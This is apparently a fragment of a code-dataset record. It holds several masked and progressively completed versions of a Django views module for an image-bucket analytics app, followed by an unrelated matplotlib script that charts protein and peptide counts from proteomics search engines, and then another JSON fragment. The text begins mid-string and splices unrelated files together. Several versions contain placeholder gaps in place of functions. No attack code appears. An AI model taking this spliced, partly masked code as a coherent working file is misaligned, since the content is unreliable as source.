bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n<mask token>\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-3": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef log_in(request):\n \"\"\"\n Handles login.\n \"\"\"\n username = request.POST.get('username')\n password = request.POST.get('password')\n if not username or not password:\n return index(request, 'Invalid credentials!')\n user = authenticate(username=username, password=password)\n if user:\n login(request, user)\n return redirect('/main')\n else:\n return index(request, 'Invalid credentials!')\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n template = loader.get_template('aimodel/main.html')\n context = dict()\n context['datasets'] = DatasetConfigManager.loaded_datasets_list()\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n user_feedback = json.loads(request.body)\n try:\n suggs = request.session['analytics'].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n<mask token>\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-4": "<mask token>\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template('aimodel/index.html')\n context = {}\n context['err_msg'] = err_msg\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef log_in(request):\n \"\"\"\n Handles login.\n \"\"\"\n username = request.POST.get('username')\n password = request.POST.get('password')\n if not username or not password:\n return index(request, 'Invalid credentials!')\n user = authenticate(username=username, password=password)\n if user:\n login(request, user)\n return redirect('/main')\n else:\n return index(request, 'Invalid credentials!')\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n template = loader.get_template('aimodel/main.html')\n context = dict()\n context['datasets'] = DatasetConfigManager.loaded_datasets_list()\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n if not request.user.is_authenticated:\n return redirect('/')\n try:\n dataset = request.POST['dataset']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n if 'analytics' in request.session:\n del request.session['analytics']\n request.session['analytics'] = AnalyticSession(dataset)\n bucket_info = request.session['analytics'].bucket_info()\n template = loader.get_template('ui/analytics.html')\n context = dict()\n context['init_buckets'] = json.dumps(bucket_info['buckets'])\n context['init_bucket_ordering'] = json.dumps(bucket_info['bucket_ordering']\n )\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n if request.user.is_authenticated:\n logout(request)\n return redirect('/')\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason='Access denied!')\n if 'analytics' not in request.session:\n err = 'Could not fetch analytic session data.'\n return HttpResponseBadRequest(reason=err)\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n return JsonResponse(request.session['analytics'].bucket_info())\n\n\ndef create_bucket(request):\n \"\"\"\n Creates a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n try:\n request.session['analytics'].create_bucket()\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n<mask token>\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n new_bucket_name = request_data['new_bucket_name']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket1_id = request_data['bucket1_id']\n bucket2_id = request_data['bucket2_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n user_feedback = json.loads(request.body)\n try:\n suggs = request.session['analytics'].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket_id = request_data['bucket_id']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request.session['analytics'].toggle_mode()\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n dim = request_data['dim']\n new_size = request_data['new_size']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n new_grid_data = request.session['analytics'].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n images = request_data['images']\n bucket_src = request_data['bucket_src']\n bucket_dst = request_data['bucket_dst']\n mode = request_data['mode']\n sort_by = request_data['sort_by']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].transfer_images(images, bucket_src,\n bucket_dst, mode)\n bucket_view_data = request.session['analytics'].bucket_view_data(\n bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse(bucket_view_data, safe=False)\n\n\n@require_POST\ndef fast_forward(request):\n \"\"\"\n Fast-forwards a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n try:\n bucket = request_data['bucket']\n n_ff = request_data['n_ff']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].fast_forward(bucket, n_ff)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n request_data = json.loads(request.body)\n print(request_data)\n try:\n bucket = request_data['bucket']\n except KeyError:\n err = 'Invalid request params!'\n return HttpResponseBadRequest(reason=err)\n try:\n request.session['analytics'].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n session_check = _check_session_valid(request)\n if session_check:\n return session_check\n del request.session['analytics']\n response = {'redirect_url': '/main'}\n return JsonResponse(response)\n",
"step-5": "from django.contrib.auth import authenticate, login, logout\nfrom django.template import loader\nfrom django.http import (HttpResponse, JsonResponse,\n HttpResponseForbidden, HttpResponseBadRequest)\nfrom django.shortcuts import redirect\nfrom django.views.decorators.http import require_POST\n\nimport json\n\nfrom aimodel.AnalyticSession import AnalyticSession\nfrom data.DatasetConfigManager import DatasetConfigManager\n\n\ndef index(request, err_msg=None):\n \"\"\"\n Renders the index page.\n \"\"\"\n template = loader.get_template(\"aimodel/index.html\")\n context = {}\n\n context[\"err_msg\"] = err_msg\n\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef log_in(request):\n \"\"\"\n Handles login.\n \"\"\"\n\n # Get the username and password\n username = request.POST.get(\"username\")\n password = request.POST.get(\"password\")\n\n if not username or not password:\n return index(request, \"Invalid credentials!\")\n\n # Authenticate and log in\n user = authenticate(username=username, password=password)\n\n if user:\n login(request, user)\n return redirect(\"/main\")\n else:\n return index(request, \"Invalid credentials!\")\n\n\ndef main(request):\n \"\"\"\n Renders the main page behind login.\n \"\"\"\n\n if not request.user.is_authenticated:\n return redirect(\"/\")\n\n template = loader.get_template(\"aimodel/main.html\")\n context = dict()\n context[\"datasets\"] = DatasetConfigManager.loaded_datasets_list()\n\n return HttpResponse(template.render(context, request))\n\n\n@require_POST\ndef analytics_session(request):\n \"\"\"\n Starts a new analytic session.\n \"\"\"\n\n if not request.user.is_authenticated:\n return redirect(\"/\")\n\n try:\n dataset = request.POST[\"dataset\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n if \"analytics\" in request.session:\n del request.session[\"analytics\"]\n\n request.session[\"analytics\"] = AnalyticSession(dataset)\n\n bucket_info = request.session[\"analytics\"].bucket_info()\n\n template = loader.get_template(\"ui/analytics.html\")\n\n context = dict()\n context[\"init_buckets\"] = json.dumps(bucket_info[\"buckets\"])\n context[\"init_bucket_ordering\"] =\\\n json.dumps(bucket_info[\"bucket_ordering\"])\n\n return HttpResponse(template.render(context, request))\n\n\ndef log_out(request):\n \"\"\"\n Logs the user out.\n \"\"\"\n\n if request.user.is_authenticated:\n logout(request)\n\n return redirect(\"/\")\n\n\ndef _check_session_valid(request):\n \"\"\"\n A helper function checking whether the user is logged in and the session\n data is present.\n \"\"\"\n if not request.user.is_authenticated:\n return HttpResponseForbidden(reason=\"Access denied!\")\n\n if \"analytics\" not in request.session:\n err = \"Could not fetch analytic session data.\"\n return HttpResponseBadRequest(reason=err)\n\n return None\n\n\ndef bucket_info(request):\n \"\"\"\n Fetches information about current buckets.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n return JsonResponse(request.session[\"analytics\"].bucket_info())\n\n\ndef create_bucket(request):\n \"\"\"\n Creates a bucket.\n \"\"\"\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n try:\n request.session[\"analytics\"].create_bucket()\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef delete_bucket(request):\n \"\"\"\n Deletes a bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].delete_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef rename_bucket(request):\n \"\"\"\n Renames a bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n new_bucket_name = request_data[\"new_bucket_name\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].rename_bucket(bucket_id, new_bucket_name)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef swap_buckets(request):\n \"\"\"\n Swaps the position of two buckets.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket1_id = request_data[\"bucket1_id\"]\n bucket2_id = request_data[\"bucket2_id\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].swap_buckets(bucket1_id, bucket2_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef toggle_bucket(request):\n \"\"\"\n Toggles (activates/deactivates) a bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].toggle_bucket(bucket_id)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef interaction_round(request):\n \"\"\"\n Performs an interaction round, providing new image suggestions.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n user_feedback = json.loads(request.body)\n\n try:\n suggs = request.session[\"analytics\"].interaction_round(user_feedback)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(suggs, safe=False)\n\n\n@require_POST\ndef bucket_view_data(request):\n \"\"\"\n Obtains bucket view data, i.e., the images in the bucket with bucket\n confidences.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket_id = request_data[\"bucket_id\"]\n sort_by = request_data[\"sort_by\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n bucket_view_data =\\\n request.session[\"analytics\"].bucket_view_data(bucket_id, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(bucket_view_data, safe=False)\n\n\ndef toggle_mode(request):\n \"\"\"\n Toggles between Tetris/grid.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request.session[\"analytics\"].toggle_mode()\n\n return JsonResponse({})\n\n\n@require_POST\ndef grid_set_size(request):\n \"\"\"\n Resizes the grid.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n dim = request_data[\"dim\"]\n new_size = request_data[\"new_size\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n new_grid_data = request.session[\"analytics\"].grid_set_size(dim,\n new_size)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(new_grid_data, safe=False)\n\n\n@require_POST\ndef transfer_images(request):\n \"\"\"\n Transfers (moves/copies) images between buckets.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n images = request_data[\"images\"]\n bucket_src = request_data[\"bucket_src\"]\n bucket_dst = request_data[\"bucket_dst\"]\n mode = request_data[\"mode\"]\n sort_by = request_data[\"sort_by\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].transfer_images(images,\n bucket_src, bucket_dst,\n mode)\n bucket_view_data =\\\n request.session[\"analytics\"].bucket_view_data(bucket_src, sort_by)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse(bucket_view_data, safe=False)\n\n\n@require_POST\ndef fast_forward(request):\n \"\"\"\n Fast-forwards a bucket.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n try:\n bucket = request_data[\"bucket\"]\n n_ff = request_data[\"n_ff\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].fast_forward(bucket, n_ff)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\n@require_POST\ndef ff_commit(request):\n \"\"\"\n Commits a fast-forward.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n request_data = json.loads(request.body)\n\n print(request_data)\n\n try:\n bucket = request_data[\"bucket\"]\n except KeyError:\n err = \"Invalid request params!\"\n return HttpResponseBadRequest(reason=err)\n\n try:\n request.session[\"analytics\"].ff_commit(bucket)\n except ValueError as e:\n return HttpResponseBadRequest(reason=str(e))\n\n return JsonResponse({})\n\n\ndef end_session(request):\n \"\"\"\n Ends an analytic session.\n \"\"\"\n\n session_check = _check_session_valid(request)\n\n if session_check:\n return session_check\n\n del request.session[\"analytics\"]\n\n response = {\n \"redirect_url\": \"/main\"\n }\n\n return JsonResponse(response)\n",
"step-ids": [
13,
16,
17,
19,
22
]
}
|
[
13,
16,
17,
19,
22
] |
import matplotlib.pyplot as plt
file_list = ["Quantification_comet_fdr.csv",
"Quantification_crux_fdr.csv",
"Quantification_msfg_fdr.csv",
"Quantification_msfg_percolator.csv"]
file_titles = ["Comet",
"Crux",
"MSGFPlus",
"MSGFPlus + Percolator"]
protein_list = []
peptides_list = []
for file_name in file_list:
proteins = 0 # n of proteins
peptides = 0
for line_index, line in enumerate(open(file_name, 'r')):
if line_index > 3: # Proteins are listed after row 4
proteins += 1
peptides += int(line.split('\t')[3]) # n_peptides is in column 4
protein_list.append(proteins)
peptides_list.append(peptides)
print(f"{file_name} is done")
plt.bar(file_titles,
protein_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing proteins found")
plt.ylabel("Number of proteins matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_proteins.png")
plt.bar(file_titles,
peptides_list,
color=['black', 'red', 'green', 'blue', 'cyan'],
edgecolor='blue')
plt.title("Comparing amount of peptides matched")
plt.ylabel("Total amount of peptides matched")
plt.tight_layout() # Fixes cut off labels
plt.savefig("search_engines_peptides.png")
|
normal
|
{
"blob_id": "e08159a51b611ce6d0ca354a4fe6759d00af2cb7",
"index": 660,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor file_name in file_list:\n proteins = 0\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3:\n proteins += 1\n peptides += int(line.split('\\t')[3])\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f'{file_name} is done')\nplt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing proteins found')\nplt.ylabel('Number of proteins matched')\nplt.tight_layout()\nplt.savefig('search_engines_proteins.png')\nplt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing amount of peptides matched')\nplt.ylabel('Total amount of peptides matched')\nplt.tight_layout()\nplt.savefig('search_engines_peptides.png')\n",
"step-3": "<mask token>\nfile_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',\n 'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']\nfile_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']\nprotein_list = []\npeptides_list = []\nfor file_name in file_list:\n proteins = 0\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3:\n proteins += 1\n peptides += int(line.split('\\t')[3])\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f'{file_name} is done')\nplt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing proteins found')\nplt.ylabel('Number of proteins matched')\nplt.tight_layout()\nplt.savefig('search_engines_proteins.png')\nplt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing amount of peptides matched')\nplt.ylabel('Total amount of peptides matched')\nplt.tight_layout()\nplt.savefig('search_engines_peptides.png')\n",
"step-4": "import matplotlib.pyplot as plt\nfile_list = ['Quantification_comet_fdr.csv', 'Quantification_crux_fdr.csv',\n 'Quantification_msfg_fdr.csv', 'Quantification_msfg_percolator.csv']\nfile_titles = ['Comet', 'Crux', 'MSGFPlus', 'MSGFPlus + Percolator']\nprotein_list = []\npeptides_list = []\nfor file_name in file_list:\n proteins = 0\n peptides = 0\n for line_index, line in enumerate(open(file_name, 'r')):\n if line_index > 3:\n proteins += 1\n peptides += int(line.split('\\t')[3])\n protein_list.append(proteins)\n peptides_list.append(peptides)\n print(f'{file_name} is done')\nplt.bar(file_titles, protein_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing proteins found')\nplt.ylabel('Number of proteins matched')\nplt.tight_layout()\nplt.savefig('search_engines_proteins.png')\nplt.bar(file_titles, peptides_list, color=['black', 'red', 'green', 'blue',\n 'cyan'], edgecolor='blue')\nplt.title('Comparing amount of peptides matched')\nplt.ylabel('Total amount of peptides matched')\nplt.tight_layout()\nplt.savefig('search_engines_peptides.png')\n",
